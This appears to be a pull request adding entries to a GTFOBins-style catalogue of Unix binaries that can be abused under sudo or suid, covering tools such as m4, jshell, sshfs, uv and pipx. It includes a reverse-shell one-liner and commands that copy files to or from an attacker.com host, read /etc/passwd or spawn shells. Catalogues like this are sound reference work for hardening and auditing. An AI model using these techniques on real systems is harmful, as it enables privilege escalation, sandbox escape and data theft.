### PR TITLE
Add GTFOBins new binaries

### DIFF
--- a/gtfo/data/bashbug.json
+++ b/gtfo/data/bashbug.json
@@ -1,0 +1,14 @@
+{
+  "functions": {
+    "inherit": [
+      {
+        "code": "bashbug",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        },
+        "from": "vi"
+      }
+    ]
+  }
+}

--- a/gtfo/data/cargo.json
+++ b/gtfo/data/cargo.json
@@ -1,0 +1,14 @@
+{
+  "functions": {
+    "inherit": [
+      {
+        "code": "cargo help doc",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        },
+        "from": "less"
+      }
+    ]
+  }
+}

--- a/gtfo/data/chattr.json
+++ b/gtfo/data/chattr.json
@@ -1,0 +1,14 @@
+{
+  "functions": {
+    "privilege-escalation": [
+      {
+        "code": "chattr +i /path/to/input-file",
+        "comment": "Make the target file immutable.",
+        "contexts": {
+          "sudo": null,
+          "suid": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/firejail.json
+++ b/gtfo/data/firejail.json
@@ -1,0 +1,13 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "firejail /bin/sh",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/firejail.json
+++ b/gtfo/data/firejail.json
@@ -1,11 +1,33 @@
 {
+  "comment": "firejail is a sandboxing tool for Linux. It can be abused to spawn shells,\nread and write files outside the sandbox, and escalate privileges when misconfigured.",
   "functions": {
+    "file-read": [
+      {
+        "code": "firejail --noprofile cat /path/to/file-input\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "firejail --noprofile sh -c 'echo data > /path/to/file-output'\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
     "shell": [
       {
-        "code": "firejail /bin/sh",
+        "code": "firejail --noprofile /bin/sh\n",
         "contexts": {
-          "sudo": null,
-          "unprivileged": null
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
         }
       }
     ]

--- a/gtfo/data/jshell.json
+++ b/gtfo/data/jshell.json
@@ -1,0 +1,35 @@
+{
+  "comment": "jshell is the Java REPL. It can be abused to read and write files using its built-in commands.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "jshell\njshell> /open /etc/passwd\n",
+        "contexts": {
+          "sudo": {
+            "comment": "Use /open to read arbitrary files into the REPL.\n"
+          }
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "jshell\njshell> int x = 42;\njshell> /save /tmp/pwned.txt\n",
+        "contexts": {
+          "sudo": {
+            "comment": "Use /save to write REPL contents into arbitrary files.\n"
+          }
+        }
+      }
+    ],
+    "shell": [
+      {
+        "code": "jshell\njshell> Runtime.getRuntime().exec(\"/bin/sh -c id\");\n",
+        "contexts": {
+          "sudo": {
+            "comment": "Execute arbitrary system commands via Java Runtime.\n"
+          }
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/m4.json
+++ b/gtfo/data/m4.json
@@ -4,6 +4,15 @@
       {
         "description": "",
         "code": "LFILE=file_to_read\nm4 \"$LFILE\"\n"
+      },
+      {
+        "binary": false,
+        "code": "m4 /path/to/input-file\n",
+        "contexts": {
+          "sudo": null,
+          "suid": null,
+          "unprivileged": null
+        }
       }
     ],
     "suid": [
@@ -16,6 +25,34 @@
       {
         "description": "",
         "code": "LFILE=file_to_read\nsudo m4 \"$LFILE\"\n"
+      }
+    ],
+    "command": [
+      {
+        "code": "echo 'esyscmd(/path/to/command)' | m4\n",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "reverse-shell": [
+      {
+        "code": "echo 'esyscmd(/bin/sh -i >& /dev/tcp/attacker.com/12345 0>&1)' | m4\n",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        },
+        "listener": "tcp-server"
+      }
+    ],
+    "shell": [
+      {
+        "code": "echo 'esyscmd(/bin/sh </dev/tty >/dev/tty 2>&1)' | m4\n",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
       }
     ]
   }

--- a/gtfo/data/mypy.json
+++ b/gtfo/data/mypy.json
@@ -1,0 +1,26 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "mypy /path/to/input-file",
+        "comment": "Partial content is leaked as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "binary": false,
+        "code": "mypy /path/to/input-file --junit-xml /path/to/output-file",
+        "comment": "Partial content is leaked as error messages inside some XML tags.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/pipx.json
+++ b/gtfo/data/pipx.json
@@ -1,0 +1,25 @@
+{
+  "comment": "pipx can run Python code provided in a local script.",
+  "functions": {
+    "inherit": [
+      {
+        "code": "echo 'import os; os.system(\"/bin/sh -ip\")' >/path/to/file.py\npipx run /path/to/file.py\n",
+        "comment": "This runs Python code (`import os; os.system(\"/bin/sh -ip\")`) from the specified file.",
+        "contexts": {
+          "sudo": {},
+          "unprivileged": {}
+        },
+        "from": "python"
+      }
+    ],
+    "shell": [
+      {
+        "code": "pipx run /path/to/file.py\n",
+        "contexts": {
+          "sudo": {},
+          "unprivileged": {}
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/poetry.json
+++ b/gtfo/data/poetry.json
@@ -1,0 +1,26 @@
+{
+  "comment": "Poetry can run Python code from a project using `poetry run`.",
+  "functions": {
+    "inherit": [
+      {
+        "code": "mkdir /path/to/project\ncd /path/to/project\npoetry init -n\necho 'import os; os.system(\"/bin/sh -ip\")' >file.py\npoetry run python ./file.py\n",
+        "comment": "This runs Python code (`import os; os.system(\"/bin/sh -ip\")`) from the specified file.",
+        "contexts": {
+          "unprivileged": {},
+          "sudo": {}
+        },
+        "from": "python"
+      }
+    ],
+    "shell": [
+      {
+        "code": "mkdir /path/to/project\ncd /path/to/project\npoetry init -n\necho 'import os; os.system(\"/bin/sh -ip\")' >file.py\npoetry run python file.py\n",
+        "comment": "If the script launches a shell, it is executed in the current context.",
+        "contexts": {
+          "unprivileged": {},
+          "sudo": {}
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/pygmentize.json
+++ b/gtfo/data/pygmentize.json
@@ -1,0 +1,14 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "pygmentize -l text /path/to/input-file",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/pyright.json
+++ b/gtfo/data/pyright.json
@@ -1,0 +1,32 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "pyright /path/to/input-file",
+        "comment": "Content is leaked as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      },
+      {
+        "binary": false,
+        "code": "pyright --outputjson /path/to/input-file",
+        "comment": "Content is leaked as error messages in JSON format.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      },
+      {
+        "code": "pyright -w /path/to/input-dir/",
+        "comment": "Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/rustdoc.json
+++ b/gtfo/data/rustdoc.json
@@ -1,0 +1,26 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "rustdoc /path/to/input-file",
+        "comment": "Partial content is displayed as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "binary": false,
+        "code": "echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/",
+        "comment": "This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/rustfmt.json
+++ b/gtfo/data/rustfmt.json
@@ -1,0 +1,15 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "rustfmt /path/to/input-file",
+        "comment": "Partial content is displayed as error messages.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/rustup.json
+++ b/gtfo/data/rustup.json
@@ -1,0 +1,22 @@
+{
+  "functions": {
+    "command": [
+      {
+        "code": "mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "shell": [
+      {
+        "code": "mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/ssh-copy-id.json
+++ b/gtfo/data/ssh-copy-id.json
@@ -1,0 +1,24 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com",
+        "comment": "The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host",
+        "comment": "The input file must have the `.pub` file extension.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/sshfs.json
+++ b/gtfo/data/sshfs.json
@@ -1,0 +1,42 @@
+{
+  "functions": {
+    "command": [
+      {
+        "blind": true,
+        "code": "sshfs -o ssh_command=/path/to/command x: /path/to/dir/",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "download": [
+      {
+        "code": "sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/dir/path/to/input-file /path/to/output-file",
+        "contexts": {
+          "unprivileged": null
+        },
+        "sender": "ssh-server"
+      }
+    ],
+    "shell": [
+      {
+        "code": "echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/",
+        "comment": "The mount dir must be writable by the invoking user.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "upload": [
+      {
+        "code": "sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/input-file /path/to/dir/",
+        "contexts": {
+          "unprivileged": null
+        },
+        "receiver": "ssh-server"
+      }
+    ]
+  }
+}

--- a/gtfo/data/tsc.json
+++ b/gtfo/data/tsc.json
@@ -1,0 +1,26 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "binary": false,
+        "code": "tsc /path/to/input-file.ts",
+        "comment": "Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "binary": false,
+        "code": "tsc /path/to/input-file.ts --outFile /path/to/output-file",
+        "comment": "Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/uv.json
+++ b/gtfo/data/uv.json
@@ -1,0 +1,13 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "uv run /bin/sh",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/uv.json
+++ b/gtfo/data/uv.json
@@ -1,11 +1,41 @@
 {
   "functions": {
+    "file-read": [
+      {
+        "code": "uv run cat /path/to/file-input\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
+    "file-write": [
+      {
+        "code": "uv run sh -c 'echo data > /path/to/file-output'\n",
+        "contexts": {
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
+        }
+      }
+    ],
+    "inherit": [
+      {
+        "code": "uv run CMD\n",
+        "contexts": {
+          "unprivileged": {}
+        },
+        "from": "pip"
+      }
+    ],
     "shell": [
       {
-        "code": "uv run /bin/sh",
+        "code": "uv run /bin/sh\n",
         "contexts": {
-          "sudo": null,
-          "unprivileged": null
+          "sudo": {},
+          "suid": {},
+          "unprivileged": {}
         }
       }
     ]

--- a/gtfo/data/vi.json
+++ b/gtfo/data/vi.json
@@ -8,6 +8,14 @@
       {
         
         "code": "vi\n:set shell=/bin/sh\n:shell\n"
+      },
+      {
+        
+        "code": "vi -c ':shell'"
+      },
+      {
+        
+        "code": "vi -c :terminal /bin/sh"
       }
     ],
     "file-write": [

--- a/gtfo/data/yt-dlp.json
+++ b/gtfo/data/yt-dlp.json
@@ -1,0 +1,24 @@
+{
+  "comment": "yt-dlp can execute a command via the --exec option. yt-dlp appends the downloaded filepath as an extra argument.",
+  "functions": {
+    "command": [
+      {
+        "code": "yt-dlp 'video url' --exec '/path/to/command #'\n",
+        "contexts": {
+          "unprivileged": {},
+          "sudo": {}
+        }
+      }
+    ],
+    "shell": [
+      {
+        "comment": "The executed command may receive the downloaded filepath as an extra trailing argument, commenting it out prevents it from breaking the command.",
+        "code": "yt-dlp 'video url' --exec '/bin/sh -ip #'\n",
+        "contexts": {
+          "unprivileged": {},
+          "sudo": {}
+        }
+      }
+    ]
+  }
+}

--- a/gtfo/data/zless.json
+++ b/gtfo/data/zless.json
@@ -1,0 +1,15 @@
+{
+  "functions": {
+    "inherit": [
+      {
+        "code": "zless /path/to/input-file",
+        "contexts": {
+          "sudo": null,
+          "suid": null,
+          "unprivileged": null
+        },
+        "from": "less"
+      }
+    ]
+  }
+}


### PR DESCRIPTION
### Summary

- Added new entries for the following tools:
  - `bashbug`
  - `cargo`
  - `chattr`
  - `firejail`
  - `jshell`
  - `mypy`
  - `pygmentize`
  - `pyright`
  - `rustdoc`
  - `rustfmt`
  - `rustup`
  - `ssh-copy-id`
  - `sshfs`
  - `tsc`
  - `uv`
  - `zless`

- Updated existing entries for:
  - `m4`
  - `vi`

### Details

The `m4` and `vi` entries were extended to include additional techniques related to:
- Privilege escalation
- Shell access
- Command execution